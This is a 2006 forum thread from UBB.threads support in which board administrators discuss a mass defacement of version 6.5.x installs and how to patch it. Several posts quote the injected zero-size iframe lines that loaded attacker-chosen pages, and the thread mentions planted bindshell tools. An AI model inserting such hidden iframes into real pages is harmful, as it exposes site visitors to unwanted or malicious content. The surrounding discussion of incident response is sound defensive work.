Previous Thread
Next Thread
Print Thread
Hop To
Page 1 of 2 1 2
Hacked ubbthread board (6.5.2) #128608 05/03/2006 5:51 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
OP Offline
stranger
Joined: Jun 2006
Posts: 23
Last night my board (running 6.5.2) got hacked and I can't figure out how.
At the end of all index.php, index.html files and ubbthreads.php there were the following two lines added:

<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>
<html><iframe src=http://neoffic.com/t/?id=soauker width=0 Sheight=0 frameborder=0 Sscrolling=no></iframe></html>

Some users complained about popups and slow pages and that is how I found out that my board is compromised.

Actually, since I run many other virtual servers on the same server, all their index files were modified as well. So I think this guy have spent lots of time to find them (I have about 80 gigs of data in zillion files). The modified time was identical on all compromised files.

Did anyone have similar issue? I googled it and it appears that other ubbthreads boards were target of this attack as well.

My board is under heavy traffic and it is near to impossible to analyze the webserver logs.

Any idea how to patch ubbthreads agains such attacks?

Re: Hacked ubbthread board (6.5.2) #128609 05/03/2006 6:03 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
OP Offline
stranger
Joined: Jun 2006
Posts: 23
Well, I've just noticed another hacked board of a user of these forums - http://threadsdev.net

Poor fella has 4 iframes that almost locked out my computer. I had only 2.

I think this evil genius is finding his targets using Google. Maybe a simple filename renaming of the key files like ubbthreads.php could help for now?

Re: Hacked ubbthread board (6.5.2) #128610 05/03/2006 6:07 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
Check this thread:

http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560063

There is a fix for the security hole that is being used.

Re: Hacked ubbthread board (6.5.2) #128611 05/03/2006 6:16 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
OP Offline
stranger
Joined: Jun 2006
Posts: 23
Thanks! I have just stumbled on it as well.

Re: Hacked ubbthread board (6.5.2) #128612 05/03/2006 7:27 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Offline
member
Joined: Apr 2006
Posts: 116
I followed the neoffic link and it took me to http://www.ixwebhosting.com/

Here is the chat session with one of their operators:

Chat InformationPlease wait for a site operator to respond.
Chat InformationYou are now chatting with 'Satish Manem'
Satish Manem: Hello, how may I help you today?
you: Do you know anything about recent Hack Attack on UBB boards?
Satish Manem: I've read that last week was the worst in the history of hacking for hack attacks, and the target is Windows.
Satish Manem:
you: Well I have got the address of your website from the data that was left behind by hackers
you: how can you explain this?
Satish Manem: Do you mean we involve in hacking ?
you: I don't know, are you?
Satish Manem: I am sorry, we are hosting services providers.
Satish Manem: We just provide the hosting space for the domains.
you: I can see that, but your information now is pasted all over the hacked BBSes, why?
Satish Manem: I have no idea about that.
you: Am I the first person to tell you this?
Satish Manem: Yes
you: Hahaha you are full of [censored]
you: Are you not going to respond to this?
Satish Manem: Let me know if you have any other queries regarding hosting ?
you: Why should I you already look dodgy, and now you lie through your teeth, why would I be interested in your hosting?

that was it, sorry <img src="https://www.ubbcentral.com/boards/images/graemlins/smile.gif" alt="" />

Re: Hacked ubbthread board (6.5.2) #128613 05/03/2006 8:43 PM
Joined: Jun 2006
Posts: 742
JoshPet Offline
enthusiast
Offline
enthusiast
Joined: Jun 2006
Posts: 742
I had 5 hacked Threads boards today myself. Thanks for the fix!!


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Re: Hacked ubbthread board (6.5.2) #128614 05/04/2006 1:07 AM
Joined: Jun 2006
Posts: 3,837
Ian Offline
Carpal Tunnel
Offline
Carpal Tunnel
Joined: Jun 2006
Posts: 3,837
Thanks - I think we escaped - but are now patched <img src="https://www.ubbcentral.com/boards/images/graemlins/smile.gif" alt="" />

Re: Hacked ubbthread board (6.5.2) #128615 05/04/2006 1:09 AM
Joined: Jun 2006
Posts: 742
JoshPet Offline
enthusiast
Offline
enthusiast
Joined: Jun 2006
Posts: 742
I had to patch just over 50 installs at VertexHost.com and uncomprimise a couple of servers.


Joshua Pettit
Web Developer
www.ThreadsDev.net | www.JoshuaPettit.com
Re: Hacked ubbthread board (6.5.2) #128616 05/04/2006 1:20 AM
Joined: Jun 2006
Posts: 3,837
Ian Offline
Carpal Tunnel
Offline
Carpal Tunnel
Joined: Jun 2006
Posts: 3,837
I can find no evidence of it on any of our servers - mind you I have had enough hacking attempts recently to last a lifetime LOL

Re: Hacked ubbthread board (6.5.2) #128617 05/05/2006 12:30 PM
Joined: May 2006
Posts: 5
David Gentry Offline
stranger
Offline
stranger
Joined: May 2006
Posts: 5
We also had this problem and I'm glad to see it wasn't just us. My sys admin said that the modification required root access. Does this sound consistent or plausible?

Re: Hacked ubbthread board (6.5.2) #128618 05/05/2006 1:36 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started . I still haven't been able to get my hands on either of these scripts to see what they actually do.

Re: Hacked ubbthread board (6.5.2) #128619 05/05/2006 2:47 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Offline
member
Joined: Apr 2006
Posts: 116
Why don't you post them here so we all can have a look?

Re: Hacked ubbthread board (6.5.2) #128620 05/05/2006 4:59 PM
Joined: Jun 2006
Posts: 23
misho Offline OP
stranger
OP Offline
stranger
Joined: Jun 2006
Posts: 23
I have followed hacker's links and downloaded bindz plus the tools he used. They are, I must say, pretty good. Let me know if you want to see them and will send you the link. (Don't want to post them here because... well you know why.)

Re: Hacked ubbthread board (6.5.2) #128621 05/05/2006 9:04 PM
Joined: May 2004
Posts: 38
HuntAmerica.com Offline
newbie
Offline
newbie
Joined: May 2004
Posts: 38
I also was hacked.. and yesterday i applied the patch that was listed here.. http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560078/"

However i was hacked again after those two patches were applied... If i go to the admin panel and close my forums can i still be hacked..

And is there other forum software that is less vulnerable than what infopop has produced..

Re: Hacked ubbthread board (6.5.2) #128622 05/05/2006 11:15 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
You'll probably want to grab 6.5.4. It's possible that the one script that was found to be potentially vunerable was used. It's also verypossible that there were backdoors left from the original hack. Usually if someone gets in, they will always try and leave themselves a backdoor. Do you have access to your server error logs? If so, you can look there to see any unusual requests for clues.

As for less vulnerable software. Unfortunately this seems to happen to just about all of them from time to time. Do a quick scan of google and you'll see there's been security releases of this nature put out for just about all the major products. If there is a hole anywhere it will be found. It would be best if the hole was never there, but unfortunately it was and the only thing we can do is get a fix out prompty, which we did.

Steps are being taken in the way version 7 has been developed to help in the security area. We've been doing this long enough now that we know what the common oversights are that usually cause these problems and will be doing everything we can to preent them in the future.

Re: Hacked ubbthread board (6.5.2) #128623 05/06/2006 8:14 AM
Joined: May 2004
Posts: 38
HuntAmerica.com Offline
newbie
Offline
newbie
Joined: May 2004
Posts: 38
Rick, I have submitted a support ticket to get the security patches up thru version 6.5.4

Re: Hacked ubbthread board (6.5.2) #128624 05/06/2006 8:40 AM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
Great, I'll go and get you the fix.

Re: Hacked ubbthread board (6.5.2) #128625 05/06/2006 2:15 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Offline
member
Joined: Apr 2006
Posts: 116
Rick, what register_globals does? Is it like use strict in perl? I would like to know just in case I have to fix other scripts that don't like it.

Re: Hacked ubbthread board (6.5.2) #128626 05/06/2006 2:19 PM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Offline
member
Joined: Apr 2006
Posts: 116
Ah, ok, I googled for it and

"...From PHP 4.2 onwards, the default behaviour of PHP is to have register_globals set to off..."

Re: Hacked ubbthread board (6.5.2) #128627 05/06/2006 3:59 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
It is default to off, but you'll still find it set to On quite often. It's a good idea to check and see what the setting is for your install just incase.

Re: Hacked ubbthread board (6.5.2) #128628 05/07/2006 7:01 AM
Joined: Oct 2006
Posts: 12
Thwala Offline
stranger
Offline
stranger
Joined: Oct 2006
Posts: 12

I have the following error when I applly the fix and perform the upgrade:

"The following files are reporting a wrong version:"

all changed files are then listed despite the fact that I have uploaded the latest files (version 6.5.4) onto my server.

Is something preventing me from applying the fix?

Re: Hacked ubbthread board (6.5.2) #128629 05/07/2006 9:42 AM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
Hi Thwala. Try looking at the comment section (first 10-15 lines) of one of the changedfiles that you uploaded. Make sure that they say # File Version 6.5.4 in that section.

If they all have that, then we can do a manual upgrade for you. Really it's just a matter of uploading the changed files and then running one db command.

Re: Hacked ubbthread board (6.5.2) #128630 05/09/2006 2:09 PM
Joined: May 2006
Posts: 5
David Gentry Offline
stranger
Offline
stranger
Joined: May 2006
Posts: 5
Rick,

After speaking with my sysadmin in more detail he is pretty sure that root access was obtained via the blindz script. If you want to talk to him directly I would be happy to send his contact info along.

[]Hi David. Was your sysadmin saying that the hacker required root access? If that's the case, then no. It allowed them access to anything the webserver could write to. At that point on some servers they uploaded a pwned or bindz script that could be started . I still haven't been able to get my hands on either of these scripts to see what they actually do. [/]

Re: Hacked ubbthread board (6.5.2) #128631 05/09/2006 5:44 PM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Offline
Addict
Joined: Aug 2004
Posts: 458
Rick, for the 6.5.4 ypgrade that you mentioned, is there a short list of the lines of code that should be added just like for 6.5.3 where you mentioned two files and what needs to be changed within them?

For instance in showflat is define('SHOWPOST',1); the only thing that needs to be added? Is it also ok to do this for 6.5.2 or 6.5.1?

Re: Hacked ubbthread board (6.5.2) #128632 05/09/2006 6:11 PM
Joined: Jun 2006
Posts: 9,243
Rick Offline
Former Developer
Offline
Former Developer
Joined: Jun 2006
Posts: 9,243
Unfortunatley there's not a list, for the most part it's the same type of quick fixes. I've kept this information off the public forums as to not provide any info to potential troublemakers for everyone can upgrade. If you need the exact changes, just open up a support ticket and I can give you more info.

Re: Hacked ubbthread board (6.5.2) #128633 05/10/2006 5:36 AM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Offline
Addict
Joined: Aug 2004
Posts: 458
Thanks man, Josh sent me the exact changes via a PM on threadsdev.net.

I noticed a strange file in my threads folder: bindtty

I downloaded it and erased it straight away but have no idea whether it was just uploaded by someone or whether it was part of the file restore that I ran on my server. Hmmm...

Will the file come in handy, does someone want to take a look at it? Can any information be gained from it?

Re: Hacked ubbthread board (6.5.2) #128634 05/10/2006 8:05 AM
Joined: Jun 2006
Posts: 956
Zarzal Offline
Old Hand
Offline
Old Hand
Joined: Jun 2006
Posts: 956
"i suspect bindtty is just a bindshell that opens port 5299 and allows people to connect to your server as whatever user the program is run at..

if its in an ikonboard dir i expect they've hacked you via some insecure script and got in as your httpd uid. might be worth doing a further search around your system to see if they've done anything else"

found with Google.


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
Ich kann bei Fragen zu UBBthreads in Deutsch weiterhelfen oder es zumindest versuchen
Re: Hacked ubbthread board (6.5.2) #128635 05/10/2006 12:57 PM
Joined: Jun 2006
Posts: 15,844
Gizmo Offline
UBB.threads Developer
Offline
UBB.threads Developer
Joined: Jun 2006
Posts: 15,844
bindtty is, in most cases, a mallicious script; if you did not put it there, it is not bundeled with any infopop product (to my knowledge).


I am a Web Development Contractor, I do not work for UBBCentral. I have provided free User to User Support since the beginning of these support forums.
Need to Upgrade?
Forums: A Gardeners Forum Scouters World
UBB.threads: UBBWiki, UBB Styles, UBB.Sitemaps
Longtime Supporter & Resident Post-A-Holic
VNC Web Services: Code Modifications, Upgrades, Styling, Coding Services, Disaster Recovery, and more!
Re: Hacked ubbthread board (6.5.2) #128636 05/10/2006 1:22 PM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Offline
Addict
Joined: Aug 2004
Posts: 458
I know that someone put it there without my knowledge. No doubt about it.

But can we find anything out about the people responsible by analysing the file?

Re: Hacked ubbthread board (6.5.2) #128637 05/10/2006 3:53 PM
Joined: Jun 2006
Posts: 956
Zarzal Offline
Old Hand
Offline
Old Hand
Joined: Jun 2006
Posts: 956
its a generic file, just google for it, you will find many sources. Its part of a root kit. You have to analyse your server log files to find out from where it comes. I guess it comes from brasilia ....

You can do nothing.

Erase this file, check the server for any kind of rootkit, dont allow the excution of scripts from the /tmp folder, apply any php patch (5.1.4 is actual) turn globals of and check any script running on your server for updates.

There are many scripts out there with security holes. I found a gallerie script on my server with possble XSS holes. Threads closed many holes and I continue my checks.

Watch your server error log file frequently


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
Ich kann bei Fragen zu UBBthreads in Deutsch weiterhelfen oder es zumindest versuchen
Re: Hacked ubbthread board (6.5.2) #128638 05/10/2006 4:28 PM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Offline
Addict
Joined: Aug 2004
Posts: 458
[]dont allow the excution of scripts from the /tmp folder[/]

How does wiping the folder clean sound?

I just chucked out all this stats mumbo jumbo and emptied the entire foler. Does that help? <img src="https://www.ubbcentral.com/boards/images/graemlins/smile.gif" alt="" />

Just out of curiosity, is it still true that no Threads board has beed hacked with the globals turned off?

Re: Hacked ubbthread board (6.5.2) #128639 05/10/2006 5:17 PM
Joined: Jul 2006
Posts: 2,143
David Dreezer Offline
Pooh-Bah
Offline
Pooh-Bah
Joined: Jul 2006
Posts: 2,143
[]How does wiping the folder clean sound?[/]

Doesn't mean something won't be put in there 5 minutes from now. Your server is supposed to use /tmp. It's temporary workspace. What you want to do though, is ensure that things put in there can't be used impropery. Removing script execution goes a long way toward acheiving that.


This thread for sale. Click here! [Linked Image from navaho.infopop.cc]
Re: Hacked ubbthread board (6.5.2) #128640 05/11/2006 2:55 AM
Joined: Aug 2004
Posts: 458
Conrad Offline
Addict
Offline
Addict
Joined: Aug 2004
Posts: 458
Hi Dave, do you mean changing the permissions for the folder, or also for files inside it?

The folder is set to 700. Should I also disable the "execute" attribute for the owner and make it 600?

Re: Hacked ubbthread board (6.5.2) #128641 05/11/2006 7:03 AM
Joined: Jun 2006
Posts: 869
Stan Offline
old hand
Offline
old hand
Joined: Jun 2006
Posts: 869
I turned off the globals, as per code given a week ago or so.

Got hacked day before yesterday

[]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>[/]

Makes me wonder if they got our domain address by coming here...


http://clubadventist.com/forums

No longer following the carrot
Re: Hacked ubbthread board (6.5.2) #128642 05/11/2006 9:38 AM
Joined: Jun 2006
Posts: 869
Stan Offline
old hand
Offline
old hand
Joined: Jun 2006
Posts: 869
am eager to try the alpha or beta 7.0 version.

Re: Hacked ubbthread board (6.5.2) #128643 05/11/2006 1:01 PM
Joined: Jun 2006
Posts: 956
Zarzal Offline
Old Hand
Offline
Old Hand
Joined: Jun 2006
Posts: 956
As I see you use 6.5.1.1
Get 6.5.4 or open a ticket to get information for another fix. There is still another hole in the system that can be used to hack your forum.
Or do you have apply the 2 fixes an got hacked again ?


my board: http://www.dragonclan-forum.de
my hobby: http://www.biker-reise.de
Ich kann bei Fragen zu UBBthreads in Deutsch weiterhelfen oder es zumindest versuchen
Re: Hacked ubbthread board (6.5.2) #128644 05/11/2006 1:24 PM
Joined: Jun 2006
Posts: 3,837
Ian Offline
Carpal Tunnel
Offline
Carpal Tunnel
Joined: Jun 2006
Posts: 3,837
[]I turned off the globals, as per code given a week ago or so.

Got hacked day before yesterday

[]<html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=soauker marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>[/]

Makes me wonder if they got our domain address by coming here... [/]

More likely just via google or similar.

Re: Hacked ubbthread board (6.5.2) #128645 05/12/2006 1:00 AM
Joined: May 2004
Posts: 6
patrickegan Offline
stranger
Offline
stranger
Joined: May 2004
Posts: 6
I found this guy

[]soauker@gmail.com[/] he hacked my site today and admitted doing it. I tried to get Google to give up his details. They told me to go !#@ myself.

This guy soauker is a member of a cyber hacker group and has actually even reported a few php vulnerabilities in phpnuke in the past.

His gig is to run up the CPM impressions on some banners that someone is paying him to run. I'd pay him to leave my site alone.. Yeah either that or burn his house down and sow salt on the land so that nothing would ever grow there again.

Re: Hacked ubbthread board (6.5.2) #128646 05/12/2006 6:56 AM
Joined: Jun 2006
Posts: 869
Stan Offline
old hand
Offline
old hand
Joined: Jun 2006
Posts: 869
On of our members did a "go back" click and it showed which domains it is clicking on, this may be useful
[]http://clubadventist.com/clickback.png[/]


http://clubadventist.com/forums

No longer following the carrot
Re: Hacked ubbthread board (6.5.2) #128647 05/12/2006 9:09 AM
Joined: Apr 2006
Posts: 116
fatalpapercut Offline
member
Offline
member
Joined: Apr 2006
Posts: 116
You guys are still using Internet Explorer? Then you have no right to complain about security! <img src="https://www.ubbcentral.com/boards/images/graemlins/wink.gif" alt="" />

Page 1 of 2 1 2

Forum Search
ShoutChat Box
Comment Guidelines: Do post respectful and insightful comments. Don't flame, hate, spam.
Recent Topics
UBB Dev
by JAISP - 11/03/2019 11:01 AM
Exceeded Number of attachments
by rbrtgrmn - 11/02/2019 9:57 PM
Forum New User Registration
by kf6zpl - 10/25/2019 10:45 AM
Having issue with redirects to UBB classic URLs
by amciotola - 10/16/2019 12:11 AM
Unable to save General settings
by amciotola - 10/13/2019 3:23 AM
Who's Online Now
0 registered members (), 75 guests, and 387 spiders.
Key: Admin, Global Mod, Mod
Random Gallery Image
Latest Gallery Images
Artistic structures
Artistic structures
by isaac, August 29
Stones
Stones
by isaac, August 19
Amusing Terain Scenics
Amusing Terain Scenics
by isaac, August 19
Sky places
Sky places
by isaac, August 19
Powered by UBB.threads™ PHP Forum Software 7.7.4
(Snapshot build 20191023)